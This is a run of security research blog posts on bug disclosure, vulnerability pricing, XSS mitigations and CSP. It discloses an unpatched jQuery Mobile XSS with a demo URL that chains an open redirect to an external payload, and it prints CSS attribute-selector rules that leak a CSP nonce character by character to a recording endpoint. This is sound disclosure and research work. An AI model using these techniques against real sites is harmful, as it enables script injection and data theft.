Saturday, February 11, 2017

Vulnerability disclosure in an era of vulnerability rewards

Note: This (and every post in this blog) is a personal blog post which expresses my personal opinion, and doesn't necessarily have to be the same opinion as my employer.

Recently a few bug hunters have been taking rounds around the internet, looking for vulnerabilities and then contacting the website owner asking for money to disclose these to them. This prompted a discussion on Twitter which I thought was interesting.

What we know today as Bug Bounty Programs (or more aptly named, Vulnerability Reward Programs), was started by some individuals proactively searching for vulnerabilities on their time for fun, curiosity or to evaluate the security of the software they use, and then reported them publicly or privately to the vendors. In many cases, these bug hunters got no permission or blessing from the vendor ahead of time, but vendors thought that activity was useful for them, so they decided to formalize it and launched reward programs. Fast forward to 2017 and tens of millions of dollars have been paid to thousands of bug hunters all around the world. That turned out pretty well, after all.

However, this created a new normal, where bug hunters might expect to get paid for their research "per bug". And consequently, this also created an incentive for a few bug hunters to reach out to vendors without these programs with the purpose of hoping they can convince the vendor to start one. I don't think the bug hunters doing that are "bad people". What they are doing is slightly better than sitting on the bugs, or sharing them on private forums as it used to be the norm 10 years ago, and while I definitely think they should be disclosing the vulns and getting them fixed, I respect their freedom not to.

That said, this left those vendors without reward programs (either for lack of money, or lack of support) at odds, in that they get the worst of both worlds. Little attention from skilled professional bug hunters and tons of attention by those that are just looking to make money out of it. And at least some of those vendors, ended up perceiving the behavior as extortion.

This can result in a very dangerous "us vs. them" mentality. We shouldn't be fighting with each other on this. We shouldn't be calling each other scammers. That has the only side effect of burning bridges and alienating the bug hunters we need to work the most closely with.

What I think we should do, as vendors, is politely and consistently decline every attempt to disclose issues in a way that is unfair or dangerous to users and other bug hunters. That means, if you can't give out rewards , don't cave in for those asking you for money by email. If you already have a reward program, don't bend or change the rules for these people.

Instead, we, as vendors, have to invest to create a community of bug hunters around us. Many people are willing to invest time to help vendors, even when money is not involved. Reasons for that vary (they do it for the challenge, curiosity, or fun), and in exchange for their help, many of them often appreciate a "thank you" as appreciation, and recognition in some advisory. Vendors need to be welcoming, transparent and appreciative. This is important for any vendor that wants to collaborate with independent security researchers, even more important for those vendors just starting to build their community, and specially important for those that need a lot of help and don't have much resources.

What I think we should do, as security researchers, is to not let a few vendors give the wrong impression of the rest of the industry. We should continue to be curious, and continue to advance the state of the art. However, just as jaywalking carries risks, we need to be careful on how we do this work. Pentesting without authorization is very risky, even more so if the testing causes damage, or gives the impression it was malicious.

Instead, as researchers we should treat vendors as we would treat our neighbors and be respectful and polite, not doing to them what you wouldn't want them to do to you. I think 99.99% of researchers already behave like this, and the few that don't are just learning. Let's make sure we continue to grow our community with respect and humility and help those that are just starting.

The security disclosure world of today is a lot better than how it was 10 to 20 years ago, and I'm glad to see such great relationships between vendors and security researchers. Let's keep on improving it ๐Ÿ˜Š.

Wednesday, February 08, 2017

๐Ÿคท Unpatched (0day) jQuery Mobile XSS

TL;DR - Any website that uses jQuery Mobile and has an open redirect is now vulnerable to XSS - and there's nothing you can do about it, there's not even patch  ¯\_(ใƒ„)_/¯ .

jQuery Mobile is a cool jQuery UI system that makes building mobile apps easier. It does some part of what other frameworks like Ember and Angular do for routing. Pretty cool, and useful. Also vulnerable to XSS.

While researching CSP bypasses a few months ago, I noticed that jQuery Mobile had this funky behavior in which it would fetch any URL in the location.hash and put it in innerHTML. I thought that was pretty weird, so decided to see if it was vulnerable to XSS.

Turns out it is!

The bug


The summary is:

  1. jQuery Mobile checks if you have anything in location.hash.
  2. If your location.hash looks like a URL, it will try to set history.pushState on it, then it will do an XMLHttpRequest to it.
  3. Then it will just innerHTML the response.
As a strange saving grace, actually, the fact that it tries to call history.pushState first, makes the attack a little bit harder to accomplish, since you can't set history.pushState to cross-origin URLs, so in theory this should be safe.

But it isn't, because if you have any open redirect you suddenly are vulnerable to XSS. Since the open redirect would be same origin as far as history.pushState is concerned.

So.. you want to see a demo, I'm sure. Here we go:
http://jquery-mobile-xss.appspot.com/#/redirect?url=http://sirdarckcat.github.io/xss/img-src.html
The code is here (super simple).

The disclosure


Fairly simple bug, super easy to find! I wouldn't be surprised if other people had found out about this already. But I contacted jQuery Mobile, and told them about this, and explained the risk.

The jQuery Mobile team explained that they consider the Open Redirect to be the vulnerability, and not their behavior of fetching and inlining, and that they wouldn't want to make a change because that might break existing applications. This means that there won't be a patch as far as I have been informed. The jQuery mobile team suggests to 403 all requests made from XHR that might result in a redirect.

This means that every website that uses jQuery Mobile, and has any open redirect anywhere is vulnerable to XSS.

Also, as a bonus, even if you use a CSP policy with nonces, the bug is still exploitable today by stealing the nonce first. The only type of CSP policy that is safe is one that uses hashes or whitelists alone.

The victim

jQuery Mobile is actually pretty popular! Here's a graph of Stack Overflow questions, over time.

And here's a graph of jQuery Mobile usage statistics over time as well:

You can recreate these graphs here and here. So, we can say we are likely to see this in around 1 or 2 websites that we visit every week. Pretty neat, IMHO.

I don't know how common are open redirects, but I know that most websites have them. Google doesn't consider them vulnerabilities (disclaimer, I work in Google - but this is a personal blog post), but OWASP does (disclaimer, I also considered them to be vulnerabilities in 2013). So, in a way, I don't think jQuery Mobile is completely wrong here on ignoring this.

Now, I anyway wanted to quantify how common it is to have an open redirect, so I decided to go to Alexa and list an open redirect for some of the top websites. Note that open redirect in this context includes "signed" redirects, since those can be used for XSS.

Here's a list from Alexa:
  1. Google
  2. YouTube
  3. Facebook
  4. Baidu
  5. Yahoo
I also thought it would be interesting to find an open redirect on jQuery's website, to see if a random site and not just the top might have one, and while I did find they use Trac which has an Open Redirect, I wasn't able to test it because I don't have access to their bug tracker =(.

Conclusion

One opportunity for further research, if you have time in your hands is to try to find a way to make this bug work without the need of an Open Redirect. I tried to make it work, but it didn't work out.

In my experience, Open Redirects are very common, and they are also a common source of bugs (some of them cool). Perhaps we should start fixing Open Redirects. Or perhaps we should be more consistent on not treating them as vulnerabilities. Either way, for as long as we have this disagreement in our industry, we at least get to enjoy some XSS bugs.

If you feel motivated to do something about this, the jQuery team suggested to send a pull request to their documentation to warn developers of this behavior, so I encourage you to do that! Or just help me out spread the word of this bug

Thanks for reading, and I hope you liked this! If you have any comments please comment below or on Twitter. =)

Wednesday, January 25, 2017

Fighting XSS with ๐Ÿ›ก Isolated Scripts

TL;DR: Here's a proposal for a new way to fight Cross-Site Scripting vulnerabilities called Isolated Scripts. You have an open-source prototype to play with the idea. Please let me know what you think!

Summary

In the aftermath of all the Christmas' CSP bypasses, a discussion came up with @mikewest and @fgrx on the merits of using the Isolated Worlds concept (explained below) as a security mitigation to fight XSS. It seemed like an interesting problem, so I spent some time looking into it.

The design described below would allow you (a web developer) to defend some of your endpoints against XSS with just two simple steps:
  1. Set a new cookie flag (isolatedScript=true).
  2. Set a single HTTP header (Isolated-Script: true).
And that's it. With those two things you could defend your applications against XSS. It is similar to Suborigins but Isolated Scripts defends against XSS even within the same page!

And that's not it, another advantage is that it also mitigates third-party JavaScript code (such as Ads, Analytics, etcetera). Neat, isn't it?

Design

The design of Isolated Scripts consists of three components that work together to deliver the Isolated Scripts proposal.
  1. Isolated Worlds
  2. Isolated Cookies
  3. Secret HTML
I describe each one of them below and then show you the demo.

๐ŸŒ Isolated Worlds


Isolated Worlds is a concept most prominently used today in Chrome Extensions user scripts, and Greasemonkey scripts in Firefox - essentially, they allow JavaScript code to get a "view" over the document's DOM but in an isolated JavaScript runtime. Let me explain:

Let's say that there is a website with the following code:


The Isolated World will have access to document.getElementById("text") but it will not have access to window.variable. That is, the only thing that both scripts share is an independent view of the HTML's DOM. This isolation is very important, because user scripts have elevated privileges, for example, they can trigger XMLHttpRequests requests to any website and read their responses.

If it wasn't for the Isolated World, then the page could do something like this to execute code in the user script, and attack the user:
document.getElementById = function() {
    arguments.callee.caller.constructor("attack()")();
};
In this way, the Isolated World allows us to defend our privileged execution context from the hostile user execution context. Now, the question is: Can we use the same design to protect trusted scripts from Cross-Site Scripting vulnerabilities?

That is, instead of focusing on preventing script execution as a mitigation (which we've found out to be somewhat error prone), why don't we instead focus on differentiating trusted scripts from untrusted scripts?

The idea of having privileged and unprivileged scripts running in the same DOM is not new, in fact, there are a few implementations out there (such as Mario Heiderich's Iceshield, and Antoine Delignat-Lavaud Defensive JS), but their implementation required rewriting code to overcome the hostile attacker. In Isolated Worlds, normal JavaScript code just works.

So, that is the idea behind Isolated Scripts - provide a mechanism for a web author to mark a specific script as trusted, which the browser will then run in an Isolated World.
An easy way to implement this in a demo is by actually reusing the Isolated Worlds implementation in Chrome Extensions, and simply install a user script for every script with the right response header.

๐Ÿช Isolated Cookies


Now that we have a script running in a trusted execution context, we need a way for the web server to identify requests coming from it. This is needed because the server might only want to expose some sensitive data to Isolated Scripts.

The easiest way to do so would be simply by adding a new HTTP request header similar to the Origin header (we could use Isolated-Script: foo.js for example). Another alternative is to create a new type of cookie that is only sent when the request comes from a Isolated Script. This alternative is superior to the HTTP header for two reasons:
  1. It is backwards compatible, browsers that don't implement it will just send the cookie as usual.
  2. It can work in conjunction with Same-site cookies (which mitigates CSRF as well).
To clarify, the web server would do this:
Set-Cookie: SID=XXXX; httpOnly; secure; SameSite=Strict; isolatedScript

And the browser will then process the cookie as usual, except that it will only include it in requests if they are made by the Isolated Script. And browsers that don't understand the new flag will always include them.

An easy way to implement this in a demo is to instead of using flags, using a special name in the cookie, and refuse to send the cookie except for cases when the request comes from the isolated script.
One idea that Devdatta proposed was to make use of cookie prefixes, which could also protect the cookies from clobbering attacks.

๐Ÿ™ˆ Secret HTML


What we have now is a mechanism for a script to have extra privileges, and be protected from hostile scripts by running in an isolated execution context, however, the script will, of course want to display the data to the user, and if the script writes it to the DOM, the malicious script would immediately be able to read it. So, for that, we need a way for the Isolated Script to write HTML that the hostile scripts can't read.

While this primitive might sound new, it actually already exists today! It's already possible for JavaScript code to write HTML that is visible to the user, but unavailable to the DOM. There are at least two ways to do this:
  1. Creating an iframe and then navigating the iframe to a data:text/html URL (it doesn't work in Firefox because they treat data: URLs as same-origin).
  2. Creating an iframe with a sandbox attribute without the allow-same-origin flag (works in Chrome and Firefox).
So, to recap, we can already create HTML nodes that are inaccessible to the parent page. The only issue left is perhaps how to make it easily backwards compatible. So we have two problems left:
  • CSS wouldn't be propagated down to the iframe, but to solve this problem we can propagate the calculated style down to the iframe's body, which will allow us to ensure that the text would look the same as if it was in the parent page (note, however that selectors wouldn't work inside it).
  • Events wouldn't propagate to the parent page, but to solve that problem we could just install a simple script that forwards all events from the iframe up to the parent document.
With this, the behavior would be fairly similar to the secret HTML but without providing a significant information leak on to the hostile script. 
An easy way to implement this in a demo is to create a setter function on innerHTML, and whenever the isolated script tries to set innerHTML we instead create a sandboxed iframe with the content, to which we postMessage the CSS and the HTML and a message channel that can be used to propagate events up the iframe. To avoid confusing other code dependencies, we could create this iframe inside of a closed Shadow DOM.
One potential concern for the design of this feature that Malte brought up was that depending on the implementation this could potentially mess up with developer experience, as some scripts most likely assume that code in the DOM is reachable (eg, via querySelector, getElementsByTagName or otherwise). This is very important, and possibly the most valuable lesson to take - rather than having security folks like me design APIs with weird restrictions, we should also be asking authors what they need to do their work.

Demo

Alright! So now that I explained the concept and how it was implemented in the demo, it's time for you to see it in action.

First of all, to emulate the browser behavior you need to install a chrome extension (don't worry, no scary permissions), and then just go to the "vulnerable website" and try to steal the contents of the XHR response! If you can steal them, you win a special Isolated Scripts ๐Ÿ‘• T-Shirt my eternal gratitude ๐Ÿ™ (and, of course ๐ŸŽค fame & glory).

So, let's do it!
  1. Install Chrome Extension
  2. Go to Proof of Concept website
There are XSS everywhere on the page (both DOM and reflected), and I disabled the XSS filter to make your life easier. I would be super interested to learn about different ways to break this!

Note that there are probably implementation bugs that wouldn't be an issue in a real browser implementation, but please let me know about them anyway (either on twitter or on the comments below), as while they don't negate the design, they are nevertheless something we should keep in mind and fix for the purpose of making this as close to reality as possible.

In case you need it, the source code of the extension is here and the changes required to disable CSP and enable Isolated Scripts instead is here.

๐Ÿ” Analysis

Now, I'm obviously biased on this, since I already invested some time on this idea, but I think it's at least promising and has some potential. That said, I want to do an analysis on it's value and impact to avoid over-promising. I will use the framework to measure web security mitigations that I described in my previous blog post (but if you haven't read it, don't worry, I explain this below).

Moderation

Moderation stands for: How much are we limiting the impact of the problem?

In this case, the impact is extremely easy to measure (modulo implementation flaws).
Any secret data that is protected with Isolated Cookies is only exposed to Isolated Scripts. And any data touched by Isolated Scripts is hidden from XSS. So, the web author gets to decide the degree of moderation it requires.
One interesting caveat to this that Mario brought up, is that conducting phishing attacks using XSS would still be possible, and is very likely to result in compromise with a tiny bit of social engineering.

Minimization

Minimization stands for: How much are we minimizing the number of problems?

We can also measure this. Most XSS, including content sniffing and plugin-based SOP bypasses (even some types of universal XSS bugs!) can be mitigated with Isolated Scripts, but some types of DOM XSS aren't.
The DOM XSS that are not mitigated by Isolated Scripts, are, for example, Angular Template Injections, and eval()-based XSS - that is because they still inherit the capabilities of the Isolated Script.
I would love to hear of any other types of bugs that wouldn't be mitigated by Isolated Scripts.

Substitution

Substitution stands for: How much are we replacing risks with safer alternatives?

We can also quickly measure how much we are replacing the current risks with Isolated Scripts. In particular, adoption seems very easy although it has some problems:
  1. JavaScript code hosted in CDNs can't run in the Isolated World. This is working as intended, but also might limit the ease of deployment. One easy way to fix this is to use ES6 import statements.
  2. Code that expects to have access to "secret content" (like advertising, for example) won't be able to do so anymore and might fail in unexpected ways (note, however that in a browser implementation it might make sense to actually give access to the secret HTML to the Isolated script, if possible).
I would be super interested to hear any other problems you think developers might find in adoption.

Simplification

Simplification stands for: How much are we removing problems, rather than adding complexity?

Generally, we are adding complexity and removing complexity, and it's somewhat subjective to decide whether they cancel each other out or not.
  • On one hand, we are removing complexity by requiring all interactions with secret data to happen through a single funnel.
  • On the other hand, by adding yet another cookie flag and a new condition for script execution, and a new type of DOM isolation we are making the web platform more difficult to understand.
I honestly think that we are making this a bit more complicated. Not as much as other mitigations, but slightly so. I would be interested to hear any arguments on how "bad" this complexity would be for the web platform.

Conclusion

Thank you so much for reading so far, and I hope you found reading this as interesting as I found writing it.

I think a good next step from here is to hear more feedback on the proposal (from both, authors, browsers and hackers!), and perhaps identify ways we can simplify it further, ways to break it, and ways to make it more developer friendly.

If you have any ideas, please leave comments below or on twitter (or you can also email me).

Until next time ๐Ÿ˜ธ

Monday, January 23, 2017

Measuring web security mitigations

Summary: This past weekend I spent some time implementing a prototype for a web security mitigation, and I also spent some time thinking whether it was worth implementing as a web platform feature or not. In this blog post, I want to share how I approached the problem, which I hope you find useful, and to hopefully get your feedback about it too.

I've seen amazing progress on controlling the effects of XSS by adopting inherent safety on software engineering (a term which means focusing on completely eliminating the hazard) and I'm fairly confident that is today's most effective way to tackle it. However, there is always value in evaluating other types of controls beyond pure prevention - perhaps moving on to ways to minimize or contain its risk.

The way I see the problem is that the value of a mitigation can be measured by:
  • Impact - How many vulnerabilities was this mitigation designed to control?
  • Difficulty - What is the cost to adopt this mitigation on a system?
Measuring difficulty is somewhat easy, one should just try to apply the mitigation to real-life applications and see how difficult it is, however, measuring impact can be really difficult on a complex system.

The way this problem was approached in other fields was by measuring mitigations and controls across four metrics (wiki):
  • Moderation - How much are we limiting the impact of the problem.
  • Minimization - How much are we minimizing the number of problems.
  • Substitution - How much are we replacing risks with safer alternatives.
  • Simplification - How much are we removing problems, rather than adding complexity.
So, a naive way to look at this problem, is to evaluate the impact a mitigation has across these four metrics.

For example, I am a fan of Suborigins, an idea that aims to limit the impact a single XSS vulnerability can have by creating a more fine-grained concept of an origin. Suborigins is a good example of Moderation. It does not reduce the number of XSS vulnerabilities, it just makes it so that their impact is significantly reduced. On the other hand, we have the Angular sandbox - it aimed to limit the impact of the problem, but doing so effectively was extremely difficult, and eventually, the sandbox was removed completely.

Another good example is Minimization, and a great example of this is X-Content-Type-Options and X-Frame-Options. These are HTTP headers that allow a site owner to opt-out of behavior that can cause clickjacking, or some types of content sniffing vulnerabilities. If a website owner deploys these headers across their whole website then the amount of places that are likely to be affected can be drastically reduced. On the other hand, we have browser XSS filters and Web Application Firewalls. After many years, I think our industry reached consensus that they are not real security boundaries, and we largely stopped considering bypasses as security vulnerabilities.

Then we have mitigations that website owners can take that can Substitute a risky behavior with a less risky alternative. A good example for this is the use of JSON.parse instead of eval(). By providing a safe alternative to parse JSON content, the browsers have allowed website developers to write code that parses structured data without having to fully trust the data provider. On the other hand, we have DOM APIs (createElement / setAttribute / appendChild) as a replacement for innerHTML. While the use of DOM APIs is really safer, it's also so much more difficult and inconvenient that developers just don't use it - if the alternative is not easy to adopt, developers just won't adopt it.

And finally, we reach Simplification. A great example of a good simple API are httpOnly cookies, it does what it says, it restricts cookies so that they are available over HTTP only, and not JavaScript making credential stealing (and persistence) really hard in many cases. On the other hand, Ian Hixie eloquently explained the complexity problem with CSP back in 2009:
First, let me state up front some assumptions I'm making:
  • Authors will rely on technologies that they perceive are solving their problems,
  • Authors will invariably make mistakes, primarily mistakes of omission,
  • The more complicated something is, the more mistakes people will make. 
I think a valuable lesson (in retrospect) is that we should aim for baby steps (like httpOnly) that provide obvious simple benefits, and then build up on that, rather than big complex systems with dubious security benefits.


And that's it =) - The purpose of this blog post is not to make a scorecard of different mitigations and their merits, but rather to propose a common language and framework for us to discuss whether a mitigation is valuable or not. Hopefully, so that we can better focus our efforts on those that make the most sense for the internet.

Thanks for reading, and please let me know what you think below or on twitter!

Tuesday, December 27, 2016

How to bypass CSP nonces with DOM XSS ๐ŸŽ…

TL;DR - CSP nonces aren't as effective as they seem to be against DOM XSS. You can bypass them in several ways. We don't know how to fix them. Maybe we shouldn't.

Thank you for visiting. This blog post talks about CSP nonce bypasses. It starts with some context, continues with how to bypass CSP nonces in several situations and concludes with some commentary. As always, this blog post is my personal opinion on the subject, and I would love to hear yours.

My relationship with CSP, "it's complicated"

I used to like Content-Security-Policy. Circa 2009, I used to be really excited about it. My excitement was high enough that I even spent a bunch of time implementing CSP in JavaScript in my ACS project (and to my knowledge this was the first working CSP implementation/prototype). It supported hashes, and whitelists, and I was honestly convinced it was going to be awesome! My abstract started with "How to solve XSS [...]".

But one day one of my friends from elhacker.net (WHK) pointed out that ACS (and CSP by extension) could be trivially circumvented using JSONP. He pointed out that if you whitelist a hostname that contains a JSONP endpoint, you are busted, and indeed there were so many, that I didn't see an easy way to fix this. My heart was broken.๐Ÿ’”

Fast-forward to 2015, when Mario Heiderich made a cool XSS challenge called "Sh*t, it's CSP!", where the challenge was to escape an apparently safe CSP with the shortest payload possible. Unsurprisingly, JSONP made an appearance (but also Angular and Flash). Talk about beating a dead horse.

And then finally in 2016 a reasonably popular paper called "CSP Is Dead, Long Live CSP!" came out summarizing the problems highlighted by WHK and Mario after doing an internet-wide survey of CSP deployments, performed by Miki, Lukas, Sebastian and Artur. The conclusion of the paper was that CSP whitelists were completely broken and useless. At least CSP got a funeral , I thought.

However, that was not it. The paper, in return, advocated for the use of CSP nonces instead of whitelists. A bright future for the new way to do CSP!

When CSP nonces were first proposed, my concern with them was that their propagation seemed really difficult. To solve this problem, dominatrixss-csp back in 2012 made it so that all dynamically generated script nodes would work by propagating the script nonces with it's dynamic resource filter. This made nonce propagation really simple. And so, this exact approach was proposed in the paper, and named strict-dynamic, now with user-agent support, rather than a runtime script as dominatrixss-csp was. Great improvement. We got ourselves a native dominatrixss!

This new flavor of CSP, proposed to ignore whitelists completely, and rely solely on nonces. While the deployment of CSP nonces is harder than whitelists (as it requires server-side changes on every single page with the policy), it nevertheless seemed to propose real security benefits, which were clearly lacking on the whitelist-based approach. So yet again, this autumn, I was reasonably optimistic of this new approach. Perhaps there was a way to make most XSS actually *really* unexploitable this time. Maybe CSP wasn't a sham after all!

But this Christmas, as-if it was a piece of coal from Santa, Sebastian Lekies pointed out what in my opinion, seems to be a significant blow to CSP nonces, almost completely making CSP ineffective against many of the XSS vulnerabilities of 2016.

A CSS+CSP+DOM XSS three-way

While CSP nonces indeed seem resilient against 15-years-old XSS vulnerabilities, they don't seem to be so effective against DOM XSS. To explain why, I need to show you how web applications are written now a days, and how that differs from 2002.

Before, most of the application logic lived in the server, but in the past decade it has been moving more and more to the client. Now a days, the most effective way to develop a web application is by writing most of the UI code in HTML+JavaScript. This allows, among other things for making web applications offline-ready, and provides access to an endless supply of powerful web APIs.

And now, newly developed applications still have XSS, the difference is that since a lot of code is written in JavaScript, now they have DOM XSS. And these are precisely the types of bugs that CSP nonces can't consistently defend against (as currently implemented, at least).

Let me give you three examples (non-exhaustive list, of course) of DOM XSS bugs that are common and CSP nonces alone can't defend against:
  1. Persistent DOM XSS when the attacker can force navigation to the vulnerable page, and the payload is not included in the cached response (so need to be fetched).
  2. DOM XSS bugs where pages include third-party HTML code (eg, fetch(location.pathName).then(r=>r.text()).then(t=>body.innerHTML=t);)
  3. DOM XSS bugs where the XSS payload is in the location.hash (eg, https://victim/xss#!foo?payload=).
To explain why, we need to travel back in time to 2008 (woooosh!). Back in 2008, Gareth Heyes, David Lindsay and I made a small presentation in Microsoft Bluehat called CSS - The Sexy Assassin. Among other things, we demonstrated a technique to read HTML attributes purely with CSS3 selectors (which was coincidentally rediscovered by WiSec and presented with kuza55 on their 25c3 talk Attacking Rich Internet Applications a few months later).

The summary of this attack is that it's possible to create a CSS program that exfiltrates the values of HTML attributes character-by-character, simply by generating HTTP requests every time a CSS selector matches, and repeating consecutively. If you haven't seen this working, take a look here. The way it works is very simple, it just creates a CSS attribute selector of the form:

*[attribute^="a"]{background:url("record?match=a")}
*[attribute^="b"]{background:url("record?match=b")}
*[attribute^="c"]{background:url("record?match=c")}
[...]

And then, once we get a match, repeat with:
*[attribute^="aa"]{background:url("record?match=aa")}
*[attribute^="ab"]{background:url("record?match=ab")}
*[attribute^="ac"]{background:url("record?match=ac")}
[...]

Until it exfiltrates the complete attribute.

The attack for script tags is very straightforward. We need to do the exact same attack, with the only caveat of making sure the script tag is set to display: block;.

So, we now can extract a CSP nonce using CSS and the only thing we need to do so is to be able to inject multiple times in the same document. The three examples of DOM XSS I gave you above permit exactly just that. A way to inject an XSS payload multiple times in the same document. The perfect three-way.

Proof of Concept

Alright! Let's do this =)

First of all, persistent DOM XSS. This one is troubling in particular, because if in "the new world", developers are supposed to write UIs in JavaScript, then the dynamic content needs to come from the server asynchronously.

What I mean by that is that if you write your UI code in HTML+JavaScript, then the user data must come from the server. While this design pattern allows you to control the way applications load progressively, it also makes it so that loading the same document twice can return different data each time.

Now, of course, the question is: How do you force the document to load twice!? With HTTP cache, of course! That's exactly what Sebastian showed us this Christmas.

A happy @slekies wishing you happy CSP holidays! Ho! ho! ho! ho!
Sebastian explained how CSP nonces are incompatible with most caching mechanisms, and provided a simple proof of concept to demonstrate it. After some discussion on twitter, the consequences became quite clear. In a cool-scary-awkward-cool way.

Let me show you with an example, let's take the default Guestbook example from the AppEngine getting started guide with a few modifications that add AJAX support, and CSP nonces. The application is simple enough and is vulnerable to an obvious XSS but it is mitigated by CSP nonces, or is it?

The application above has a very simple persistent XSS. Just submit a XSS payload (eg, <H1>XSS</H1>) and you will see what I mean. But although there is an XSS there, you actually can't execute JavaScript because of the CSP nonce.

Now, let's do the attack, to recap, we will:

  1. with CSS attribute reader.
  2. with the CSP nonce.

Stealing the CSP nonce will actually require some server-side code to keep track of the bruteforcing. You can find the code here, and you can run it by clicking the buttons above.

If all worked well, after clicking "Inject the XSS payload", you should have received an alert. Isn't that nice? =). In this case, the cache we are using is the BFCache since it's the most reliable, but you could use traditional HTTP caching as Sebastian did in his PoC.

Other DOM XSS

Persistent DOM XSS isn't the only weakness in CSP nonces. Sebastian demonstrated the same issue with postMessage. Another endpoint that is also problematic is XSS through HTTP "inclusion". This is a fairly common XSS vulnerability that simply consists on fetching some user-supplied URL and echoing it back in innerHTML. This is the equivalent of Remote File Inclusion for JavaScript. The exploit is exactly the same as the others.

Finally, the last PoC of today is one for location.hash, which is also very common. Maybe the reason is because of IE quirks, but many websites have to use the location hash to implement history and navigation in a single-page JavaScript client. It even has a nickname "hashbang". In fact, this is so common that every single website that uses jQuery Mobile has this "feature" enabled by default, whether they like it or not.

Essentially, any website that uses hashbang for internal navigation is as vulnerable to reflected XSS as if CSP nonces weren't there to being with. How crazy is that! Take a look at the PoC here (Chrome Only - Firefox escapes location.hash).

Conclusion

Wow, this was a long blog post.. but at least I hope you found it useful, and hopefully now you will be able to understand a bit better the real effectiveness of CSP, maybe learn a few browser tricks, and hopefully got some ideas for future research.

Is CSP preventing any vulns? Yes, probably! I think all the bugs reported by GOBBLES in 2002 should be preventable with CSP nonces.

Is CSP a panacea? No, definitely not. It's coverage and effectiveness is even more fragile than we (or at least I) originally thought.

Where do we go from here?
  • We could try to lock CSP at runtime, as Devdatta proposed.
  • We could disallow CSS3 attribute selectors to read nonce attributes.
  • We could just give up with CSP. ๐Ÿ’ฉ
I don't think we should give up.. but I also can't stop wondering whether all this effort we spend on CSP could be better used elsewhere - specially since this mechanism is so fragile it runs the real risk of creating an illusion of security where it does not exist. And I don-t think I'm alone in this assessment.. I guess time will tell.

Anyway, happy holidays, everyone! and thank you for reading. If you have any feedback, or comments please comment below or on Twitter!

Hasta luego!

Saturday, December 10, 2016

Vulnerability Pricing

What is the right price for a security vulnerability?

TL;DR: Vendors should focus on vulnerabilities, not on exploits. Vulnerabilities should be priced based on how difficult they are to find, not just on their exploitability.

I've been searching for an answer to this question for a while now. And this blog post is my attempt at answering it from my personal opinion.

The first answer is the economics from the security researchers perspective. Given that vendors do bug bounties as a way to interact with and give back to the security community, the rewards are mostly targeted towards compensating and showing appreciation. As a result, for these researchers, getting 5k USD for what they did over a few days as a research project or personal challenge is pretty neat.

In contrast, the "grey market" for those looking for vulnerabilities to exploit them (let's call them "exploiters"), the priorities are focused around the vulnerability reliability and stability.

As an "exploiter", you want good, simple, dumb, reliable bugs. For bug hunters, finding these *consistently* is difficult. It's not about giving yourself a challenge to find a bug in Chrome this month, but rather you seek to be able to create a pipeline of new bugs every month and if possible, even grow the pipeline over time. This is way more expensive than "bug hunting for fun".

Now, of course, there is an obvious profit opportunity here. Why not buy the bugs from those security researchers that find them in their spare time for fun, and resell them to "exploiters" for 10x the price? Well, that happens! Bug brokers do precisely that. So what happens is that then the prices from these "bug brokers" are just limited by how much the "exploiters" want to pay for them (which is a lot, more on that below).

However, and very importantly. We haven't discussed the cost of going from vulnerability to exploit. Depending on the vulnerability type, that might either be trivial (for some design/logic flaw issues) or very difficult (for some memory corruption issues).

Now, surprisingly, this key difference might give vendors a fighting chance. Software vendors in their mission to make their software better, actually don't care (or at least shouldn't care) about the difficulty to write a reliable exploit. Vendors want the vulnerability to fix it, learn from it, and find ways to prevent it from happening again.

This means that a software vendor should be able to get and find value from a vulnerability immediately, while if you wanted to make an exploit and sell it to those that want to exploit it, that would cost a significant amount of additional research and effort if there are a lot of mitigations along the way (sandboxes, isolation, etc).

So, it seems that the vendor's best chance in the "vendor" vs. "exploiter" competition is twofold: (1) to focus on making exploits harder and more expensive to write, and  (2) to focus on making vulnerabilities as profitable to find and to report as possible. With the goal that eventually the cost of "weaponizing" a vulnerability is higher than the cost for finding the next bug.

The second answer to this question is the economics from the "exploiters" and the vendors perspective.

For the vendors, software engineering is so imperfect that if you have a large application, you will have a lot of bugs and you will introduce more the more you code.

So for software vendors, learning of a lot of vulnerabilities isn't as valuable as preventing those many from happening in the first place. In other words, being notified of a vulnerability is not useful except if that knowledge is used to prevent the next one from happening.

Prices then (for vendors) should be, first of all, set to match the traffic these vendors can handle not just the response but the corresponding remediation work. So if the vendor has 2 full time engineers staffed to respond to security vulnerabilities, the prices should be set to approximately 2 full time engineers time.

And then, on top of that, as many engineering resources as possible should be focused on prevention (to make vulnerabilities harder to introduce), optimizing processes (to be able to handle a larger number of reports), and finally making exploits harder to write (to make finding the next bug cheaper than writing an exploit).

For the "exploiters", if they didn't have these vulnerabilities, their alternative would be to do dangerous and expensive human intelligence operations. Bribing, spying, interrogating, sabotaging etc.. all of these expensive and limited by the amount of people you can train, the amount of assets you can turn, and the amount of money they will ask for, and then your ability to keep all of this secret. Human intelligence is really very expensive.

On the other hand, they could use these security holes - super attractive capabilities that allow them to spy on those they want to spy on, reducing (or sometimes eliminating) the need for any of the human intelligence operations and their associated risks. How can it get better than that?

So they have the budget and ability to pay large sums of money. However, the vulnerability market isn't as efficient as it should be for the larger price to matter as much.

What the market inefficiency means is that if someone can make $X00,000 a year by just finding vulnerabilities (and ignoring the exploit writing), then the risk of spending a month or two writing a reliable exploit, it's at the cost of the lost opportunity on the would have been found vulnerabilities. And vendors could be able to take advantage of this opportunity.

In conclusion, it seems to me like the optimal way to price vulnerabilities for vendors is to do so based on:
(1) Identifying those vulnerabilities in the critical path of an exploit.
(2) Ignore mitigations as much as possible, for the purpose of vulnerability reward decisions.

And that will only have the intended effect if:
(a) Vendors have to have a proper investment in remediation, prevention and mitigation, as otherwise one doesn't get any value of buying these vulnerabilities.
(b) Our reliance on requiring full PoCs from security researchers will need to change if we want to get vulnerabilities to learn from them.

Thank you for reading, and please comment below or on Twitter if you disagree with anything or have any comments.

Monday, March 28, 2016

Creating a Decentralized Security Rewards Market

Imagine a world where you, a security researcher, could make money on your open source contributions, and your expertise about the security of any software. Without the intervention of the vendor, and without having to sell vulnerabilities to shady (and not-so-shady) third-parties.

That is, on top of bug bounty programs, or 0-day gray markets, you could make money by following any disclosure policy you wish.

That's exactly what Rainer Bรถhme imagined over 10 years ago, on what he called "Exploit Derivatives", which is what I want to raise attention to, today.

Hopefully, by the end of this post you'll be convinced that such a market would be good for the internet and can be made possible with today's technology and infrastructure, either officially (backed by financial institutions), or unofficially (backed by cryptocurrencies).

The advantages to software users

First of all, let me explain where the money would come from, and why.
Imagine Carlos, a Webmaster and SysAdmin for about 100 small businesses (dentists, restaurants, pet stores, and so on) in Argentina. Most of Carlos' clients just need email and a simple Wordpress installation. 
